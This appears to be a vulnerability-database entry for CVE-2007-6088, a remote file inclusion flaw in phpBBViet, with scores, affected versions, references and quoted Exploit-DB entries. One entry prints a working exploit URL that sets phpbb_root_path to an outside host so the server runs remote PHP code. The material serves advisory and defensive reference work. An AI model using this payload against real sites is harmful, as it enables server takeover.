CVE-2007-6088
published 2007-11-22CVE-2007-6088: PHP remote file inclusion vulnerability in includes/functions_mod_user.php in phpBBViet 02.03.07 and earlier allows remote attackers to execute arbitrary PHP…
PriorityP354critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.83%
93.2th percentile
PHP remote file inclusion vulnerability in includes/functions_mod_user.php in phpBBViet 02.03.07 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpbbviet | phpbbviet | <= 02.03.07 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Joomtracker 1.01 - SQL Injection
exploitdb·2008-10-09
CVE-2008-6088 Joomla! Component Joomtracker 1.01 - SQL Injection
Joomla! Component Joomtracker 1.01 - SQL Injection
---
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ \_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# d3hydr8 - rsauron - baltazar - C1c4Tr1Z - beenu - P47tr1ck #
# and all darkc0de members #
################################################################
#
# Author: rsauron
#
# Home : www.darkc0de.com
#
# Email : [email protected]
#
# Share the c0de!
#
###############
Exploit-DB
phpBBViet 02.03.2007 - 'phpbb_root_path' Remote File Inclusion
exploitdb·2007-11-17
CVE-2007-6088 phpBBViet 02.03.2007 - 'phpbb_root_path' Remote File Inclusion
phpBBViet 02.03.2007 - 'phpbb_root_path' Remote File Inclusion
---
phpBBViet 0.22 (phpbb_root_path) Remote File Include
Found: xoron
Exploit:
/includes/functions_mod_user.php?phpbb_root_path=http://netdevilz ?
Download: http://sourceforge.net/project/showfiles.php?group_id=193675
Thanx: ZeberuS - Madtoxic - Deep Emperor and All Netdevilz member
# milw0rm.com [2007-11-17]
No writeups or analysis indexed.
http://osvdb.org/38734http://secunia.com/advisories/27698http://www.securityfocus.com/bid/26482https://exchange.xforce.ibmcloud.com/vulnerabilities/38551https://www.exploit-db.com/exploits/4631http://osvdb.org/38734http://secunia.com/advisories/27698http://www.securityfocus.com/bid/26482https://exchange.xforce.ibmcloud.com/vulnerabilities/38551https://www.exploit-db.com/exploits/4631
2007-11-22
Published